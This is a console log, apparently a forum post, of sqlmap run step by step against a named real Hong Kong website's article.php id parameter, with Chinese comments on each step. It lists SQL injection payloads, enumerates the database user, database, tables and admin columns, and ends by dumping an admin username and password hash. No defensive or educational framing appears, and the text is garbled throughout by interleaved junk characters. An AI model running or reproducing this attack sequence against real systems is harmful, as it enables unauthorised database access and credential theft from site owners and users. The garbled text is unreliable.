D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
U; y1 K1 P& Yms "Mysql" --current-user /* 注解:获取当前用户名称
* o1 F/ ]0 E& ~2 l4 {5 g sqlmap/0.9 - automatic SQL injection and database takeover tool' E {4 q2 B: h/ E
http://sqlmap.sourceforge.net starting at: 16:53:54
n) ?0 y( C8 j6 {! q7 P[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as* P* V* [1 J1 v+ J+ \( n
session file- u* ^9 d' q% L
[16:53:54] [INFO] resuming injection data from session file6 s: s% @' v! R2 N4 M- E9 K/ ^
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file- [ ?6 O% r# K( I
[16:53:54] [INFO] testing connection to the target url
$ O0 e. y1 s- F. D9 ?sqlmap identified the following injection points with a total of 0 HTTP(s) reque* a8 f$ c( X) X- ~3 ^; R0 N# n
sts:
2 U9 J2 e! `8 v/ \9 F- E---0 t) ~/ Z9 h8 D
Place: GET
# ^; p& U: o) T3 {. ?Parameter: id; k+ B5 ^) B3 F9 L0 ?2 N
Type: boolean-based blind8 u; j4 i4 U7 x/ u2 |' @: u* H/ Y
Title: AND boolean-based blind - WHERE or HAVING clause
t# N' q5 P0 E: H7 D Payload: id=276 AND 799=799# z0 A1 U# O- X) A9 \/ q8 }7 Q
Type: error-based
0 p# w0 a( ]/ F- `3 Y! j: U& [ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
' J- X+ U: a7 O* y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 K' S N2 a* u- v/ h$ r. G) E
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 N ]/ m: k9 z" I$ W, l$ M W3 L),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)3 o" ~$ \8 s$ l: ^7 e {
Type: UNION query
+ a4 R" j/ ~, {/ i Title: MySQL UNION query (NULL) - 1 to 10 columns5 q) P- G$ V, C9 |
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 Z9 G0 E. d: }6 m4 p6 M
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' i4 W7 W; _. m5 ^3 [
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ H- q" s2 {. x/ N- N- X9 K' y ]5 Y Type: AND/OR time-based blind% X. f& `$ U( E
Title: MySQL > 5.0.11 AND time-based blind
% c6 \& S" V, z5 M l Payload: id=276 AND SLEEP(5)
8 x# n" y) b# s H* X9 P$ P---& y6 |9 z/ M' b2 B7 [8 G1 g
[16:53:55] [INFO] the back-end DBMS is MySQL
0 W5 ?' V9 \; @7 ]6 Uweb server operating system: Windows# z& Y4 W" p) Y; p1 e7 Y6 E x* Q
web application technology: Apache 2.2.11, PHP 5.3.04 |/ T6 ?5 d* ?9 Q7 s0 n
back-end DBMS: MySQL 5.0, T+ u% ~% U5 g* ~
[16:53:55] [INFO] fetching current user# ^& P9 f) N/ k$ i# y% \; b7 |
current user: 'root@localhost'
. o' {% k3 U0 s[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
% X) H! M. o' f& q6 f- H0 @& _tput\www.wepost.com.hk' shutting down at: 16:53:58
5 z( c0 @7 k# F0 {- X# h
& g9 D M: }* ?9 WD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- S' y& f! K+ _4 }6 C/ a* Kms "Mysql" --current-db /*当前数据库
M3 H9 {! b5 v" m sqlmap/0.9 - automatic SQL injection and database takeover tool
! h& e' ]4 E. X" b7 s http://sqlmap.sourceforge.net starting at: 16:54:16
& d$ A' O) W/ x; V, I[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
& z- C: i2 \7 w session file3 A) Z# s. e+ M5 B% C# q; W% L( L
[16:54:16] [INFO] resuming injection data from session file% v9 h* q8 m9 F/ I- W$ p
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file9 k/ u! N* l) h5 |. C8 e
[16:54:16] [INFO] testing connection to the target url1 y( d! C" e- l, E& S$ \+ j5 y
sqlmap identified the following injection points with a total of 0 HTTP(s) reque( w* n4 U( Q7 u4 E# i* V
sts:% d s! [5 _9 |( F/ v' M2 p$ {7 f
---
' E: k$ s$ b) r; q8 B& S+ lPlace: GET
9 T3 s6 J! H/ bParameter: id0 J+ h3 k* y& R, }* s7 N p
Type: boolean-based blind4 M J# [) Y1 M: z, ~; Y2 B
Title: AND boolean-based blind - WHERE or HAVING clause
2 `/ v3 S. c' P" t9 t Payload: id=276 AND 799=799- y- q" H1 Q& S1 q/ k, N ^* U% @, ~; }+ Q
Type: error-based6 g) v. g& @ @" P
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause9 {8 I7 L# j" W2 `' i% g; B
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
4 G* X9 [; [! l120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
* _0 E- v ]; Y; v; z- S),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
4 C" v: t) t7 z( X+ t$ ] Type: UNION query) N/ F2 w8 i# f4 A) x( b: }
Title: MySQL UNION query (NULL) - 1 to 10 columns
2 d- @, z# d9 i* q% n) H/ Y, x2 J Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 \) n* H0 r/ v$ i, A: [7 _8 a/ H
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 P4 g0 A& M* r6 z3 n* y/ p
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, ~& B. p; Q/ t% A& U- @
Type: AND/OR time-based blind
j& K& e5 ~! _; d* f Title: MySQL > 5.0.11 AND time-based blind7 S/ s+ |1 o3 g" N. n& _
Payload: id=276 AND SLEEP(5)7 g4 o3 Q7 D3 W. f9 {1 s- B
---- L( N8 { K$ x8 ~6 q" K
[16:54:17] [INFO] the back-end DBMS is MySQL/ l6 m' M6 d+ X3 C
web server operating system: Windows. d0 _( P% o* f& y8 R. c
web application technology: Apache 2.2.11, PHP 5.3.0
_! ]3 V+ J5 H" cback-end DBMS: MySQL 5.0
+ P; F' s: M; y" I) D' p/ b* _. C7 V[16:54:17] [INFO] fetching current database3 } c. h$ g' L- n/ A: O
current database: 'wepost'
" ^: B% z* r( D1 t5 k J3 U[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
; q3 f3 J! A8 V- h, m4 D. k; }6 Gtput\www.wepost.com.hk' shutting down at: 16:54:18
1 Z$ y1 ^: ~! P4 ?( n% Q A" lD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# A1 O. f3 y9 @% [9 i( r9 [
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
8 B9 l: _# }* `: w" a* } sqlmap/0.9 - automatic SQL injection and database takeover tool% l W: p G9 ~5 X( b7 n
http://sqlmap.sourceforge.net starting at: 16:55:25& c9 x1 O) G8 v5 y& y
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
- K8 l4 q( {8 @' L6 E# T session file
$ Q" _ i+ C, U. r+ M[16:55:25] [INFO] resuming injection data from session file
5 k \2 |; m) I0 O8 S/ K; Y[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
0 a- C- i/ s4 ?& _1 v/ |% o[16:55:25] [INFO] testing connection to the target url
( D9 w$ M1 d, ^6 [- j3 x( d4 Hsqlmap identified the following injection points with a total of 0 HTTP(s) reque2 ]+ S2 Z9 @) }1 M C; Y( v
sts:
2 x* Z# z/ G2 c! X* d---
; ~' W% h! N$ _Place: GET
$ \: g' x) |" M% jParameter: id
. {4 Y, E& f i5 u2 q; ~4 y Type: boolean-based blind+ G; R, `9 J+ G# L# w* _1 A3 U) N" |
Title: AND boolean-based blind - WHERE or HAVING clause
2 y9 @ {4 E$ c+ ~ Payload: id=276 AND 799=799
- O9 w/ C1 u8 s& | Type: error-based
6 K4 `, n5 q1 w. y& D Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause2 `& b2 |! e% G
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
7 `/ {& X7 s" o; w0 d0 p1 R9 e120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,580 s3 n! x/ f; n p
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# T' u6 v+ Z) X) G, J! v q A3 T
Type: UNION query3 G5 m( g2 E7 U4 u5 h
Title: MySQL UNION query (NULL) - 1 to 10 columns
5 I/ j/ K n* r0 B# r7 G' ~! n" H0 s Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 N3 \' K, A3 q
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),9 _- s7 J2 D% ?0 N# H1 E% Y! g$ F
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- s, S+ X. b9 A7 J5 H$ a Type: AND/OR time-based blind/ B% \ v1 T0 `! f7 t0 u( }+ b
Title: MySQL > 5.0.11 AND time-based blind, K" D0 S& n7 w0 ~
Payload: id=276 AND SLEEP(5)
7 [$ Z5 ?2 B) m, R. B$ L) [5 S9 X9 H---
- c1 j% f( N+ k! y2 f9 B+ a- G1 r4 m[16:55:26] [INFO] the back-end DBMS is MySQL
3 \2 |& e$ w; d7 e% u. v+ xweb server operating system: Windows
/ E5 `" f. B4 Aweb application technology: Apache 2.2.11, PHP 5.3.0
4 W& @( p; X; @' ~( @% |+ j" H% o9 yback-end DBMS: MySQL 5.08 ^& z6 @# x3 U9 C2 _9 f& s
[16:55:26] [INFO] fetching tables for database 'wepost'
, x$ f3 x% p/ X5 A6 T: d8 ?[16:55:27] [INFO] the SQL query used returns 6 entries1 M3 t& f8 p; _
Database: wepost% G& N, z) i# h; v8 J% ?' F
[6 tables]+ c4 j3 D! A8 j. _
+-------------+' W: ]" K! P) n$ s
| admin |
& |5 s! f7 @4 c6 P7 q/ h& B% T| article |$ [/ D) f$ X4 E
| contributor |: P. e, F; h4 b$ m$ N( F1 E
| idea |
4 n8 w; D7 Y9 w7 O7 z9 S |' j| image |( X" E4 U4 Q( N. Y; A6 |0 O
| issue |5 P% n6 @, ^* U4 T
+-------------+
6 ^4 z' x1 y% _+ X h[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
' K( R" @" U! Y- Vtput\www.wepost.com.hk' shutting down at: 16:55:331 w" Q2 b# [4 W3 z, T7 N3 p
9 |& \5 w9 @% {2 I& e$ k6 L" b! @- F5 DD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db- J' v7 n/ B. ]! I1 f( ^
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名1 w. N+ R$ n# o2 [
sqlmap/0.9 - automatic SQL injection and database takeover tool" q" X4 j' g! j8 N) T; I' P
http://sqlmap.sourceforge.net starting at: 16:56:06
" b+ D, e: L5 X, w' v% q) Nsqlmap identified the following injection points with a total of 0 HTTP(s) reque
8 S1 @5 v1 o1 R0 [sts:4 K' f) O. x( X6 l* P
---
: V! c# I5 N" S$ L: T7 I X2 bPlace: GET
; M5 X4 X4 @4 ^$ `+ X# ^* X0 A/ @9 SParameter: id
1 v! B5 Y, C) _9 [ Type: boolean-based blind
/ ]. \+ _# L% u- U& `% y Title: AND boolean-based blind - WHERE or HAVING clause
& q$ l# V) T3 d) m Payload: id=276 AND 799=7995 {; J) a8 c, R( p) X+ F1 K& {
Type: error-based" q: b7 X1 c; D C: R. _
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause2 A5 `" w' v" g8 @. I
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- b' I- \9 k* Q, @0 x3 B8 j120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58- ~' r7 t7 h( W- a' y
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)2 t$ t5 t6 o! M+ A& ~7 S
Type: UNION query
: {8 a5 r5 Q" Q* i% g Title: MySQL UNION query (NULL) - 1 to 10 columns! m, i' v3 r G( O( V0 v$ u
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* j' R2 }3 J7 M* ]4 _4 ]
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; @7 D/ J. k) U; E" N7 fCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
$ E q' i& b3 Q# d/ j: [ Type: AND/OR time-based blind Q" O( n: h5 y M5 c! B
Title: MySQL > 5.0.11 AND time-based blind% W. \6 A. ?# h4 L2 a' ~* G( g$ T
Payload: id=276 AND SLEEP(5)0 N8 a5 ~+ |$ k8 |9 @2 }% w9 Z6 a
---8 y8 q+ `# ~( a$ g8 {
web server operating system: Windows
# D0 b ~1 _' V+ `$ jweb application technology: Apache 2.2.11, PHP 5.3.0* W# a8 q2 u6 M2 u8 ~3 t8 @8 u* n8 B
back-end DBMS: MySQL 5.0
0 k) I+ S1 @$ s3 [4 \[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
0 A4 G, C. n, Xssion': wepost, wepost
3 u- {+ ^7 Q; sDatabase: wepost X3 Q* P0 C# H4 n& U
Table: admin! ?3 b: A' N: N- W+ q. j
[4 columns]0 K* L( ?! E" P, @' D. u* C
+----------+-------------+" x5 O1 T1 Q$ ~4 o" k% p; V
| Column | Type |
' Z5 c6 E8 R% ?% X# p/ \+----------+-------------+" {5 I) u1 J; i# H0 r: D
| id | int(11) |
3 n4 Y, B# X- ], V* G; b3 J# `| password | varchar(32) |
6 G/ h" E( ^0 ^| type | varchar(10) |( G$ Z. U- [$ L
| userid | varchar(20) |4 p/ t- H; P- p& n9 P) C, u
+----------+-------------+
# e" O9 M% U3 Q shutting down at: 16:56:19
; z0 D f7 n8 ~5 U- `1 z$ c
8 U$ v8 D2 r2 ] V# y) wD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db. c6 O3 b- U; u- U
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容9 N0 @! X. }- A3 R
sqlmap/0.9 - automatic SQL injection and database takeover tool
3 B- _: t: S, s( O http://sqlmap.sourceforge.net starting at: 16:57:14
/ @! o2 i9 K# ]sqlmap identified the following injection points with a total of 0 HTTP(s) reque2 j5 \: Q) j b y
sts:# N1 m6 {4 w& R
---5 a' F/ b) K2 B- `1 G
Place: GET
0 K b$ \! z, V5 Z: b$ D- ?Parameter: id
; T6 E: }& ]9 y* e- C2 D Type: boolean-based blind9 Z; n6 p e7 Q' v6 R8 S
Title: AND boolean-based blind - WHERE or HAVING clause
/ p! p$ }" t4 k% n, t9 D; S Payload: id=276 AND 799=799! b+ v" X$ c# Y, K( n
Type: error-based1 Q; D2 h& M0 V* J
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
" n; d9 ] k$ |6 w# h8 {+ v- r U4 [ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,' g5 s0 h$ d4 j
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ V0 n6 ~- j9 Z$ `2 @; c! o
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
9 _: w, Q# N7 R! h' _0 T) J1 T+ Z Type: UNION query
* l9 q1 v* q% A0 |- A Title: MySQL UNION query (NULL) - 1 to 10 columns
. F. Z- W3 I+ c! w4 N/ }% l; Q Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( s4 ?* q8 A4 S$ v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),; {, K, |; ]# k! o6 b. |
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; O+ g) s, I6 Q/ Z+ l/ s9 h
Type: AND/OR time-based blind
# y2 n5 e3 b# v5 A1 b Title: MySQL > 5.0.11 AND time-based blind
/ m6 F, o% t! u9 `" l! [) t- _& p% L Payload: id=276 AND SLEEP(5)
* A# u2 _2 z, o U---
0 b' R# _5 R O. b) L, p7 q P9 hweb server operating system: Windows/ l2 `2 I. T: s# r2 t; h) K# S
web application technology: Apache 2.2.11, PHP 5.3.0
G7 }: q9 N0 M5 `back-end DBMS: MySQL 5.0
6 u0 w+ e% } d9 Brecognized possible password hash values. do you want to use dictionary attack o
' x0 u6 _9 e; b& g5 un retrieved table items? [Y/n/q] y
2 U6 G) z6 U7 a+ M; x/ E# y' ^# P( u4 |what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
4 l3 ~8 o- X+ s. i! _do you want to use common password suffixes? (slow!) [y/N] y K7 f& } @: ?* I/ v8 M; z: x
Database: wepost9 A+ A) J4 N' U5 T
Table: admin! l5 ~3 G9 @' [) C2 n1 N% F5 U; @
[1 entry]
# j9 C$ m) Y1 \+----------------------------------+------------+
4 G8 T/ q2 V! `& h| password | userid |
9 U/ F' ]- s( ]! V) e& K+----------------------------------+------------+
% I. @" L3 |0 J! D| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
; F; C/ f0 q! v1 @+----------------------------------+------------+9 V( }9 S" O3 q6 A) k! k% b
shutting down at: 16:58:14
. G3 L1 `; a5 K6 M
1 r: p; B1 A- ]- tD:\Python27\sqlmap> |